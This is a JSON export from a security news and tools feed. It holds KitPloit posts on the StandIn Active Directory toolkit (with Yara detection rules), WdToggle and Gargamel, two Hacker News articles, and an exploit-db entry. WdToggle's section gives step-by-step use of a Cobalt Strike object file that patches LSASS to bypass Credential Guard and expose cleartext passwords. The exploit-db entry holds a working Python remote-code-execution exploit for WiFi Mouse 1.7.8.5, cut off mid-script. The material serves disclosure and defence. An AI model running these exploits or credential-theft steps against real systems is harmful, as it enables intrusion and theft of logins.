AES256_CTS_HMAC_SHA1_96 \n [+] samaccountname \n |_ M-10-1909-03$ \n [+] objectsid \n |_ S-1-5-21-1293271031-3053586410-2290657902-1127 \n [+] lastlogoff \n |_ 0 \n [+] msds-allowedtoactonbehalfofotheridentity \n |_ BinLen : 36 \n |_ AceQualifier : AccessAllowed \n |_ IsCallback : False \n |_ OpaqueLength : 0 \n |_ AccessMask : 983551 \n |_ SID : S-1-5-21-1293271031-3053586410-2290657902-1205 \n |_ AceType : AccessAllowed \n |_ AceFlags : None \n |_ IsInherited : False \n |_ InheritanceFlags : None \n |_ PropagationFlags : None \n |_ AuditFlags : None \n [+] accountexpires \n |_ 0x7FFFFFFFFFFFFFFF \n \n\n \n** Remove msDS-AllowedToActOnBehalfOfOtherIdentity ** \n \n** Use Case ** \n\n\n> _ With write access to a machine object this function allows the operator to remove a previously added ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property from the machine. _\n\n \n** Syntax ** \n\n\nRemove a previously created ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property from a machine. \n \n \n C:\\> StandIn.exe --computer m-10-1909-03 --remove \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-03 \n Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed.. \n \n\n \n** Detection ** \n\n\nThis outlines a number of IOCs which can aid in the detection engineering process for StandIn. \n\n \n** Release Package Hashes ** \n\n\nThe following table maps the release package hashes for StandIn. 
\n\n \n** Yara ** \n\n\nThe following Yara rules can be used to detect StandIn on disk, in its default form. \n \n \n rule StandIn \n { \n meta: \n author = \"Ruben Boonen (@FuzzySec)\" \n description = \"Detect StandIn string constants.\" \n \n strings: \n $s1 = \"StandIn\" ascii wide nocase \n $s2 = \"(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))\" ascii wide nocase \n $s3 = \"msDS-AllowedToActOnBehalfOfOtherIdentity\" ascii wide nocase \n $s4 = \">--~~--> Args? <--~~--<\" ascii wide nocase \n \n condition: \n all of ($s*) \n } \n \n rule StandIn_PDB \n { \n meta: \n author = \"Ruben Boonen (@FuzzySec)\" \n description = \"Detect StandIn default PDB.\" \n \n strings: \n $s1 = \"\\\\Release\\\\StandIn.pdb\" ascii wide nocase \n \n condition: \n all of ($s*) \n }\n\n \n** SilktETW Microsoft-Windows-DotNETRuntime Yara Rule ** \n\n\nThe Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the ` Microsoft-Windows-DotNETRuntime ` ETW data provider. For testing purposes, this rule can be directly evaluated using [ SilkETW ](<https://github.com/fireeye/SilkETW> \"SilkETW\" ) . It should be noted that this is a generic example rule; production alerting would require a more granular approach. 
\n \n \n rule Silk_StandIn_Generic \n { \n meta: \n author = \"Ruben Boonen (@FuzzySec)\" \n description = \"Generic Microsoft-Windows-DotNETRuntime detection for StandIn.\" \n \n strings: \n $s1 = \"\\\\r\\\\nFullyQualifiedAssemblyName=0;\\\\r\\\\nClrInstanceID=StandIn\" ascii wide nocase \n $s2 = \"MethodFlags=Jitted;\\\\r\\\\nMethodNamespace=StandIn.\" ascii wide nocase \n \n condition: \n any of them \n }\n\n \n\n\n** [ Download StandIn ](<https://github.com/FuzzySecurity/StandIn> \"Download StandIn\" ) **\n", "edition": 1, "modified": "2021-03-01T11:30:15", "published": "2021-03-01T11:30:15", "id": "KITPLOIT:6265405922368142658", "href": "http://www.kitploit.com/2021/03/standin-small-net3545-ad-post.html", "title": "StandIn - A Small .NET35/45 AD Post-Exploitation Toolkit", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-28T23:44:16", "bulletinFamily": "tools", "cvelist": [], "description": "A Proof of Concept Cobalt Strike Beacon Object File which uses [ direct system calls ](<https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/> \"direct system calls\" ) to enable ** WDigest ** credential caching and circumvent ** Credential Guard ** (if enabled). 
\n\nAdditional guidance can be found in this blog post: [ https://outflank.nl/blog/?p=1592 ](<https://outflank.nl/blog/?p=1592> \"https://outflank.nl/blog/?p=1592\" )\n\n \n\n\n** Background ** \n\n\nThis PoC code is based on the following excellent blog posts: \n\n[ Exploring Mimikatz - Part 1 - WDigest ](<https://blog.xpnsec.com/exploring-mimikatz-part-1/> \"Exploring Mimikatz - Part 1 - WDigest\" )\n\n[ Bypassing Credential Guard ](<https://teamhydra.blog/2020/08/25/bypassing-credential-guard/> \"Bypassing Credential Guard\" )\n\nUtilizing direct system calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls. \n\nVisual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code we must use the [ Mingw-w64 ](<https://mingw-w64.org> \"Mingw-w64\" ) (GCC for Windows) compiler. \n\n \n** What is this repository for? ** \n\n\n * Demonstrate the usage of direct system calls using inline assembly to provide a more opsec safe way of interacting with the LSASS process. \n * Enable ** WDigest ** credential caching by toggling the ` g_fParameter_UseLogonCredential ` global parameter to 1 within the LSASS process (wdigest.dll module). \n * Circumvent ** Credential Guard ** (if enabled) by toggling the ` g_IsCredGuardEnabled ` variable to 0 within the LSASS process (wdigest.dll module). \n * Execute this code within the Beacon process using a [ Beacon object file ](<https://www.cobaltstrike.com/help-beacon-object-files> \"Beacon object file\" ) . \n \n** How do I set this up? ** \n\n\nWe will not supply compiled binaries. You will have to do this yourself: \n\n * Clone this repository. \n\n * Make sure you have the Mingw-w64 compiler installed. 
On Mac OSX for example, we can use the ports collection to install Mingw-w64 ( ` sudo port install mingw-w64 ` ). \n\n * Run the ` make ` command to compile the Beacon object file. \n\n * Within a Cobaltstrike beacon context run the ` inline-execute ` command and provide the path to the object ` WdToggle.o ` file. \n\n * Run the Cobaltstrike ` logonpasswords ` command (Mimikatz) and notice that clear text passwords are enabled again for new user logins or users who ** unlock ** their desktop session. \n\n \n\n\n** Limitations ** \n\n\n * This memory patch is not reboot persistent, so after a reboot you must rerun the code. \n * The memory offsets of the ` wdigest!g_fParameter_UseLogonCredential ` and ` wdigest!g_IsCredGuardEnabled ` global variables could change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets, which can be found using the Windows debugger tools. \n \n \n C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64>cdb.exe -z C:\\Windows\\System32\\wdigest.dll \n \n 0:000>x wdigest!g_fParameter_UseLogonCredential \n 00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information> \n 0:000> x wdigest!g_IsCredGuardEnabled \n 00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information> \n 0:000> \n \n\n \n** Detection ** \n\n\nTo detect credential theft through LSASS memory access, we could use a tool like [ Sysmon ](<https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon> \"Sysmon\" ) . Sysmon can be configured to log processes opening a handle to the lsass.exe process. 
With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detect possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don\u2019t have the budget and luxury of using these platforms, then Sysmon is a free tool that can help fill the gap. \n\n \n** Credits ** \n\n\n * The assembly code used within this tool is based on the assembly output from the [ SysWhispers ](<https://github.com/jthuraisamy/SysWhispers> \"SysWhispers\" ) tool from [ @Jackson_T ](<https://twitter.com/Jackson_T> \"@Jackson_T\" ) . \n * Adam Chester [ @_xpn_ ](<https://twitter.com/_xpn_> \"@_xpn_\" )\n * N4kedTurtle from [ Team Hydra ](<https://teamhydra.blog> \"Team Hydra\" )\n \n \n\n\n** [ Download WdToggle ](<https://github.com/outflanknl/WdToggle> \"Download WdToggle\" ) **\n", "edition": 1, "modified": "2021-02-28T20:30:05", "published": "2021-02-28T20:30:05", "id": "KITPLOIT:7143868336892332212", "href": "http://www.kitploit.com/2021/02/wdtoggle-beacon-object-file-bof-for.html", "title": "WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-28T15:38:09", "bulletinFamily": "tools", "cvelist": [], "description": "A Forensic Evidence Acquirer \n\n \n\n\n** Compile ** \n\n\nAssuming you have Rust 1.41+ installed. 
Open a terminal in the project directory and, to compile a release build, type \n \n \n cargo build --release\n\nA debug build can be compiled using \n \n \n cargo build\n\nThe compiled executable is located at ` target/release/gargamel.exe ` or ` target/debug/gargamel.exe ` , respectively. \n\n \n** Set log level ** \n\n\nIf you wish to change the logging level: \n\n * Open ` src/main.rs `\n * On lines 42 and 43 change ` LevelFilter::Info ` to (for example) ` LevelFilter::Trace ` for more detailed logging. \n * Beware that ` LevelFilter::Trace ` will log everything, including passwords. \n \n** User guide ** \n\n\nRight now, this app works only on Windows and the target computer must use Windows or Linux. \n\nMake sure to have the following programs in the same directory as Gargamel. \n\n * ` psexec ` , [ download ](<https://docs.microsoft.com/en-us/sysinternals/downloads/psexec> \"download\" )\n * ` paexec ` , an open source alternative to PsExec, [ download ](<https://www.poweradmin.com/paexec/> \"download\" )\n * ` winpmem ` , an open source memory image tool, [ download ](<https://github.com/Velocidex/c-aff4/releases> \"download\" ) . \n * Download the newest executable and rename it to _ winpmem.exe _\n * ` plink ` and ` pscp ` , open source CLI SSH/SCP clients, [ download ](<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html> \"download\" )\n * ` SharpRDP ` , an open source command executor using RDP, [ download ](<https://github.com/vildibald/SharpRDP/releases/tag/v1.0.0> \"download\" )\n * ` WMImplant ` , an open source PowerShell WMI command executor, [ download ](<https://github.com/vildibald/WMImplant> \"download\" )\n * ` 7za.exe ` , a standalone console version of the 7zip archiver, [ download ](<https://www.7-zip.org/download.html> \"download\" )\n\nNote: both ` psexec ` and ` paexec ` are needed. 
Although both applications are supposed to be functionally equivalent, they behave differently under some circumstances. \n\n \n** Unleashing the power of Gargamel ** \n\n\nGargamel needs to be launched from an elevated terminal to be fully functional. Currently it does not support the UAC dialog nor any kind of notification when running with limited privileges. When running with limited user privileges, some operations like target memory dumping will not work. \n\n \n** Basic example ** \n\n\nAssume you want to connect to a computer with the following parameters: \n\n * address ` 192.168.42.47 `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system & application event logs using the PsExec method. Evidence will be stored in the ` testResults ` directory relative to the location of Gargamel. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults\n\nGargamel will ask you for the password of the remote user; in our example the password is ` nbusr123 ` . Note that the password will be hidden when typing. \n\nIt is also possible to specify the password directly as a program argument. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -p nbusr123 -o testResults\n\n \n** Domain example ** \n\n\nAssume you want to connect to a computer in a domain with the following parameters: \n\n * domain ` WORKSPACE `\n * computer name ` JanovPC `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system & application event logs using the PsExec method. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -o testResults\n\nOr, to skip password prompting, specify the password directly. 
\n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -p nbusr123 -o testResults\n\n \n** Other connection methods ** \n\n\nPsExec is one of the 5 supported connection methods. You can replace ` --psexec ` with the following options: \n\n * ` --psexec `\n * ` --psrem ` , if PowerShell remoting is configured on the target machine. \n * ` --rdp ` , if RDP is enabled on the target machine. \n * ` --wmi ` . \n * ` --ssh ` , if the target machine uses Linux. \n\nIt is possible to use several methods at once. For example, to use both PsExec and RDP one can use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec --rdp -o testResults\n\nThere is also a special switch ` --all ` that is equal to specifying ` --psexec --rdp --psrem --wmi ` . \n\nNote: Launch parameters are order-agnostic, i.e. it does not matter in which order the parameters are specified. \n\n \n** Acquire memory ** \n\n\nTo also acquire a memory dump, simply add the ` -m ` flag to the program parameters, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m\n\nIf you wish to acquire ONLY the memory dump without other evidence, then use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m --no-events-search --no-evidence-search --no-registry-search \n\nThis functionality is available only for Windows targets. \n\n \n** Run custom commands ** \n\n\nGargamel may run custom Windows CMD or Linux shell commands on the remote machine. \n\nFirst create a file ` custom-commands.txt ` with the following content. \n \n \n # Will be run using any method \n ipconfig \n # Will run only when launching with at least one of --all, --psexec, --wmi methods \n :psexec:wmi ipconfig -all\n\nResults of the above commands will be stored in the directory specified by the ` -o ` option. \n\nTo run the above commands written in ` custom-commands.txt ` use the ` -e ` switch, i.e. 
\n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -e custom-commands.txt \n\n \n** Download custom files ** \n\n\nGargamel is able to download remote files. \n\nFirst create a file ` custom-files.txt ` with the following content. \n \n \n C:\\Users\\Public\\sss* \n C:\\Users\\Jano\\danove.pdf \n # This line and the next one will be ignored \n # C:\\Users\\Jano\\somBajecny.pptx \n\n \n** Note: Wildcards * and ? are supported but currently only in filenames, not parent directories, i.e. C:\\Users\\J*\\danove.pdf will most likely not work. ** \n\n\nThe downloaded files will be stored in the directory specified by the ` -o ` option. \n\nTo download the files listed in ` custom-files.txt ` use the ` -s ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -s custom-files.txt \n\n \n** All options ** \n\n\nAll supported switches are described below. \n \n \n USAGE: \n gargamel.exe [FLAGS] [OPTIONS] --user <user> \n \n FLAGS: \n -a, --all Acquire evidence from Windows machine using all supported methods (PsExec, PsRemote, \n WMI, RDP). \n --no-events-search Disables Windows event logs acquisition. \n --no-evidence-search Disables acquisition of evidence that can be usually downloaded quickly (like ipconfig, \n firewall status etc..) \n --no-registry-search Disables target registry acquisition. \n -h, --help Prints help information \n -m, --mem-image Optional: Memory dump of a target Windows machine. \n --local Acquire evidence from local machine. \n --nla Optional: Use network level authentication when using RDP. (Windows targets only) \n --no-7z Optional: Disable 7zip compression for registry & memory images. This will significantly \n decrease the running time, but WMI and RDP connections will probably not work properly. \n (Windows targets only) \n --psexec Acquire evidence from Windows machine using PsExec. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. 
\n --psrem Acquire evidence from Windows machine using PowerShell. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --rdp Acquire evidence from Windows machine using RDP. Requires SharpRDP.exe in the current \n directory or in the path. \n --ssh Acquire evidence from Linux machine using SSH. Requires both plink.exe and pscp.exe in \n the current directory or in the path. \n -V, --version Prints version information \n --wmi Acquire evidence from Windows machine using WMI. Requires WMImplant.ps1 in the current \n directory or in the path and PowerShell 3.0+ on the host machine. Note: It is necessary \n to disable Windows Defender real-time protection (other AVs not tested). \n \n OPTIONS: \n -c, --computer <computer> Remote computer address/name. [default: 127.0.0.1] \n -u, --user <user> Remote user name \n -d, --domain <domain> Optional: Remote Windows domain \n -o, --output <local-store-directory> \n Name of local directory to store the evidence [default: evidence-output] \n \n -p, --password <password> \n Optional: Remote user password. Skipping this option will prompt a possibility to put a password in hidden \n way. To specify an empty password use `-p \"\"` \n \n --redownload <re-download> \n Optional: Download and DELETE specified file from target computer. Use this in case of previous failed \n partially completed operation. For just downloading a file (without deleting it) please use a `search` \n switch. If you specify a 7zip chunk (.7z.[chunk-number], e.g. 
.7z.004), then it will also automatically try to \n download subsequent chunks. Use also with --psexec --psrem, --rdp, --wmi, --all \n \n -r, --remote-storage <remote-store-directory> \n Name of remote directory to be used as a temporary storage. (Windows targets only) [default: \n C:\\Users\\Public] \n \n -e, --commands <custom-command-path> Optional: File with custom commands to execute on remote computer \n \n -s, --search <search-files-path> \n Optional: File with file names to be searched on remote computer. File names also support `*` and `?` \n wildcards on file names (but not yet parent directories). \n \n --key <ssh-key> Optional: Name/path of SSH private key file. (Linux target only) \n \n --timeout <timeout> \n Optional: Timeout in seconds for long running operations. This option is a workaround for a bug in \n WMImplant.ps1 and SharpRDP.exe where finishing of a long running operation cannot sometimes properly close \n the connection leaving the Gargamel in seemingly frozen state or executing the next operation with the \n previous one unfinished on target site. Increasing this timeout may solve issues when acquiring registry or \n memory image from target machine. [default: 300] \n \n\n \n** Known issues ** \n\n\n * WMI cannot write its output to a file with the symbol ` _ ` in its path/name. 
\n \n \n\n\n** [ Download Gargamel ](<https://github.com/Lifars/gargamel> \"Download Gargamel\" ) **\n", "edition": 1, "modified": "2021-02-28T11:30:02", "published": "2021-02-28T11:30:02", "id": "KITPLOIT:6715981344528147603", "href": "http://www.kitploit.com/2021/02/gargamel-forensic-evidence-acquirer.html", "title": "Gargamel - A Forensic Evidence Acquirer", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2021-03-01T10:27:36", "bulletinFamily": "info", "cvelist": [], "description": "Let's first take a look back at 2020!\n\nAdding to the list of difficulties that surfaced last year, 2020 was also grim for personal data protection, as it marked a new record number of leaked credentials and PI data.\n\nA whopping 20 billion records were stolen in a single year, increasing 66% from 12 billion in 2019. Incredibly, this is a 9x increase from the comparatively \"small\" amount of 2.3 billion records stolen in 2018.\n\nThis trend seems to fit an exponential curve; even worse, we are yet to see the fallout from the end-of-year \"Solorigate\" campaign, which has the potential to dwarf even these numbers by the end of 2021.\n\nFound among the leaked data are usernames, passwords, credit card numbers, bank account details, healthcare information, and other personal data. Malicious actors utilize these treasure troves of information for fraud and further attacks.\n\nIn just the first quarter of 2020, the Dutch government managed to lose a hard drive containing confidential citizen data. 
Meanwhile, the UK government exposed 28 million children's data to betting companies, and Microsoft exposed 250 million records of customer support\u2014including customers' geographic data, IP addresses, and other private information.\n\nBy April, Zoom had lost 500,000 passwords at the start of the global remote working period. In June of Q2, Oracle had also leaked billions of web tracking records by storing data on an unsecured server.\n\nQ3 kicked off with Joe Biden's campaign app exposing millions of users' sensitive voter data. This was followed by 300,000 Spotify users falling victim to account takeover attempts after their credentials were made public.\n\nThe year ended with Solorigate: an incident with a lasting impact that has yet to be fully seen. Ultimately, 2020 closed with a total of 1,114 incidents, with several governments and well-known brands\u2014such as Estee Lauder, Marriott, Nintendo, and GoDaddy\u2014involved in large-scale breaches.\n\n**Why are companies and organizations still failing?**\n\n[This trend of data breaches](<https://scirge.com/blog/2020/09/22/shadow-it-what-it-is-and-why-it-is-an-alarming-security-concern-for-every-organization/>) is quite disappointing when compared to the staggering $120 billion in global IT security spending; according to Gartner, this number has grown rapidly each year.\n\nThe only possible explanation for this inconsistency rests in user awareness and the possibility that existing technologies are missing something substantial to turn the tide on these trends.\n\nThe most common cause behind data breaches is the leak of some authentication measure\u2014this may be a username, password, token, API key, or a negligent password-less server or application.\n\nUsers are registering to third-party websites and services with corporate email addresses and credentials every day. 
In tandem, they create massive blind spots in visibility and a field of Shadow IT that no audit or security tool has been able to mitigate thus far. Each employee has around 200 accounts\u2014for every 1,000 employees, that is 200,000 potentially unknown or weak passwords, many of which may be corporate related.\n\nOnce these third parties get compromised, the credentials obtained might be reused to gain unauthorized access to other corporate services, such as email accounts or VPN servers, using attack techniques like credential stuffing or password spraying.\n\nThis was exactly the case with British Airways, which received a record GDPR fine of \u00a320 million after 400,000 passengers' data was breached, initiated through a VPN gateway accessed by a compromised account.\n\nMost large organizations use data leak prevention technologies yet fail to protect against password leaks and account takeovers. This demonstrates an apparent need for a new approach\u2014a hybrid of technological controls and immediate user awareness improvement that implements a fresh perspective on account protection.\n\n**Shedding Light on Shadow IT**\n\n[Scirge was developed](<https://scirge.com/5-steps-to-conquer-shadow-it>) with a simple and clear focus on solving an overlooked aspect of existing IT security mechanisms: discovering and protecting accounts created by employees in the cloud. This includes the capability to monitor all new registrations, as well as viewing logins with existing credentials to websites and web applications.\n\nFurthermore, it involves centrally managed strength and complexity checks for all passwords while also warning users for proper credential management.\n\nPolicy-based controls may be created to block the usage of certain email addresses or websites. 
Scirge will immediately provide users with awareness messages when they are misusing corporate credentials or disregarding password complexity requirements.\n\nCentral intelligence helps unveil reused passwords and compromised accounts via comparing every company-related account to leak databases and locally-used (Active Directory) accounts. Scirge can illuminate organizations' otherwise hidden cloud footprint while simultaneously empowering users with knowledge about password hygiene, corporate policies, and unwanted behavior when using corporate accounts.\n\nScirge accomplishes each of these goals with a clean, browser-based approach. It eliminates the need to control or view network traffic, decrypt SSL, or burden clients with full-blown agents\u2014a common source of performance degradation and compatibility issues with other security tools.\n\nUtilizing its unique features, Scirge creates visibility for all employee-created accounts and reveals password hygiene issues. Inventory for all users\u2014including departing workers\u2014is readily available, unveiling unwanted account sharing between users and potential insider threats of misusing identities when accessing online resources.\n\nThe dashboard also shows IT management what cloud apps are most used without consent, helping the company comply with regulations via collecting privacy policies and T&Cs of all services. \n\nLearn more about account protection and Shadow IT awareness [here](<https://scirge.com/5-steps-to-conquer-shadow-it>) or register to one of our [webinars](<https://webinars.scirge.com/>).\n
", "modified": "2021-03-01T10:18:42", "published": "2021-03-01T10:18:00", "id": "THN:90EAEC6C570853D90420A05EB742D51C", "href": "https://thehackernews.com/2021/03/why-do-companies-fail-to-stop-breaches.html", "type": "thn", "title": "Why do companies fail to stop breaches despite soaring IT security investment?", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-01T10:27:36", "bulletinFamily": "info", "cvelist": [], "description": "Amid heightened [border tensions](<https://en.wikipedia.org/wiki/2020%E2%80%932021_China%E2%80%93India_skirmishes>) between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups.\n\nThe attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector.\n\n\"10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure,\" Recorded Future [said](<https://www.recordedfuture.com/redecho-targeting-indian-power-sector/>) in a report published yesterday. 
\"Other targets identified included 2 Indian seaports.\"\n\nChief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.\n\nPinning the intrusions on a new group dubbed \"RedEcho,\" investigators from the cybersecurity firm's Insikt Group said the malware deployed by the threat actor shares strong infrastructure and victimology overlaps with other Chinese groups APT41 (aka Barium, Winnti, or Wicked Panda) and Tonto Team.\n\nBorder conflicts have flared up since last year after deadly clashes between Indian and Chinese soldiers in Ladakh's Galwan Valley. While 20 Indian soldiers were killed in the clashes, China [formally identified four casualties](<https://www.globaltimes.cn/page/202102/1215947.shtml>) on its side for the first time on February 19.\n\n[](<https://thehackernews.com/images/-2TuQOEnLYdE/YDy6YemLfuI/AAAAAAAAB6A/X7zGPxsQ_rM9aGz2sYyDrEd9793fX9YEwCLcBGAsYHQ/s0/INDIA.jpg>)\n\nIn the intervening months, the Indian government has banned over 200 Chinese apps for allegedly engaging in activities that posed threats to \"national security and defence of India, which ultimately impinges upon the sovereignty and integrity of India.\"\n\nNoting that the standoff between the two countries was accompanied by increased espionage activity on both sides, Recorded Future said the attacks from China involved the use of infrastructure it tracks as AXIOMATICASYMPTOTE, which encompasses a modular Windows backdoor called [ShadowPad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad>) that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.\n\nAdditionally, the report also raises questions about a possible connection between the skirmishes and a power blackout that crippled Mumbai last October.\n\nWhile [initial 
probe](<https://www.indiatoday.in/india/story/mumbai-power-outage-malware-attack-1742538-2020-11-20>) conducted by the cyber department of the western Indian state of Maharashtra traced the attack to a piece of unspecified malware identified at a Padgha-based State Load Despatch Centre, the researchers said, \"the alleged link between the outage and the discovery of the unspecified malware variant remains unsubstantiated.\"\n\n\"However, this disclosure provides additional evidence suggesting the coordinated targeting of Indian Load Despatch Centres,\" they added.\n\nInterestingly, these cyberattacks were described as originating from Chengdu, which is also the base for a network technology firm called Chengdu 404 Network Technology Company that operated as a front for a [decade-long hacking spree](<https://thehackernews.com/2020/09/apt41-hackers-wanted-by-fbi.html>) targeting more than 100 high-tech and online gaming companies.\n\n[](<https://thehackernews.com/images/-K78umNmJQMM/YDy6VJSDaFI/AAAAAAAAB58/WI3oBecq5qsNqFRJpp-pq97iP7ofk4l_ACLcBGAsYHQ/s0/india-china-hacking.jpg>)\n\nBut it's not just China. 
In the weeks leading to the clashes in May, a state-sponsored group called [Sidewinder](<https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt>) \u2014 which operates in support of Indian political interests \u2014 is said to have singled out Chinese military and government entities in a [spear-phishing attack](<https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html>) using lures related to COVID-19 or the territorial disputes between Nepal, Pakistan, India, and China.\n\nThe modus operandi aside, the finding is yet another reminder of why critical infrastructure continues to be a lucrative target for an adversary looking to cut off access to essential services used by millions of people.\n\n\"The intrusions overlap with previous Indian energy sector targeting by Chinese threat activity groups in 2020 that also used AXIOMATICASYMPTOTE infrastructure,\" the researchers concluded. \"Therefore, the focus in targeting India's electricity system possibly indicates a sustained strategic intent to access India's energy infrastructure.\"\n\nWe have reached out to India's Computer Emergency Response Team (CERT-IN), and we will update the story if we hear back.\n
", "modified": "2021-03-01T10:11:36", "published": "2021-03-01T10:11:00", "id": "THN:E0EB3D12B92F39F7FC02940AAB171B21", "href": "https://thehackernews.com/2021/03/chinese-hackers-targeted-indias-power.html", "type": "thn", "title": "Chinese Hackers Targeted India's Power Grid Amid Geopolitical Tensions", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-03-01T10:39:58", "description": "", "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "WiFi Mouse 1.7.8.5 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49601", "href": "https://www.exploit-db.com/exploits/49601", "sourceData": "# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution\r\n# Date: 25-02-2021\r\n# Author: H4rk3nz0\r\n# Vendor Homepage: http://necta.us/\r\n# Software Link: http://wifimouse.necta.us/#download\r\n# Version: 1.7.8.5\r\n# Tested on: Windows Enterprise Build 17763\r\n\r\n# Desktop Server software used by mobile app has PIN option which does not prevent command input.\r\n# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.\r\n\r\n#!/usr/bin/python\r\n\r\nfrom socket import socket, AF_INET, SOCK_STREAM\r\nfrom time import sleep\r\nimport sys\r\nimport string\r\n\r\ntarget = socket(AF_INET, SOCK_STREAM)\r\nport = 1978\r\n\r\ntry:\r\n\trhost = sys.argv[1]\r\n\tlhost = sys.argv[2]\r\n\tpayload = sys.argv[3]\r\nexcept:\r\n\tprint(\"USAGE: python \" + sys.argv[0]+ \" <target-ip> <local-http-server-ip> 
<payload-name>\")\r\n\texit()\r\n\r\n\r\ncharacters={\r\n\t\"A\":\"41\",\"B\":\"42\",\"C\":\"43\",\"D\":\"44\",\"E\":\"45\",\"F\":\"46\",\"G\":\"47\",\"H\":\"48\",\"I\":\"49\",\"J\":\"4a\",\"K\":\"4b\",\"L\":\"4c\",\"M\":\"4d\",\"N\":\"4e\",\r\n\t\"O\":\"4f\",\"P\":\"50\",\"Q\":\"51\",\"R\":\"52\",\"S\":\"53\",\"T\":\"54\",\"U\":\"55\",\"V\":\"56\",\"W\":\"57\",\"X\":\"58\",\"Y\":\"59\",\"Z\":\"5a\",\r\n\t\"a\":\"61\",\"b\":\"62\",\"c\":\"63\",\"d\":\"64\",\"e\":\"65\",\"f\":\"66\",\"g\":\"67\",\"h\":\"68\",\"i\":\"69\",\"j\":\"6a\",\"k\":\"6b\",\"l\":\"6c\",\"m\":\"6d\",\"n\":\"6e\",\r\n\t\"o\":\"6f\",\"p\":\"70\",\"q\":\"71\",\"r\":\"72\",\"s\":\"73\",\"t\":\"74\",\"u\":\"75\",\"v\":\"76\",\"w\":\"77\",\"x\":\"78\",\"y\":\"79\",\"z\":\"7a\",\r\n\t\"1\":\"31\",\"2\":\"32\",\"3\":\"33\",\"4\":\"34\",\"5\":\"35\",\"6\":\"36\",\"7\":\"37\",\"8\":\"38\",\"9\":\"39\",\"0\":\"30\",\r\n\t\" \":\"20\",\"+\":\"2b\",\"=\":\"3d\",\"/\":\"2f\",\"_\":\"5f\",\"<\":\"3c\",\r\n\t\">\":\"3e\",\"[\":\"5b\",\"]\":\"5d\",\"!\":\"21\",\"@\":\"40\",\"#\":\"23\",\"$\":\"24\",\"%\":\"25\",\"^\":\"5e\",\"&\":\"26\",\"*\":\"2a\",\r\n\t\"(\":\"28\",\")\":\"29\",\"-\":\"2d\",\"'\":\"27\",'\"':\"22\",\":\":\"3a\",\";\":\"3b\",\"?\":\"3f\",\"`\":\"60\",\"~\":\"7e\",\r\n\t\"\\\\\":\"5c\",\"|\":\"7c\",\"{\":\"7b\",\"}\":\"7d\",\",\":\"2c\",\".\":\"2e\"}\r\n\r\n\r\ndef openCMD():\r\n\ttarget.sendto(\"6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a\".decode(\"hex\"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe\r\n\r\ndef SendString(string):\r\n\tfor char in string:\r\n\t\ttarget.sendto((\"7574663820\" + characters[char] + 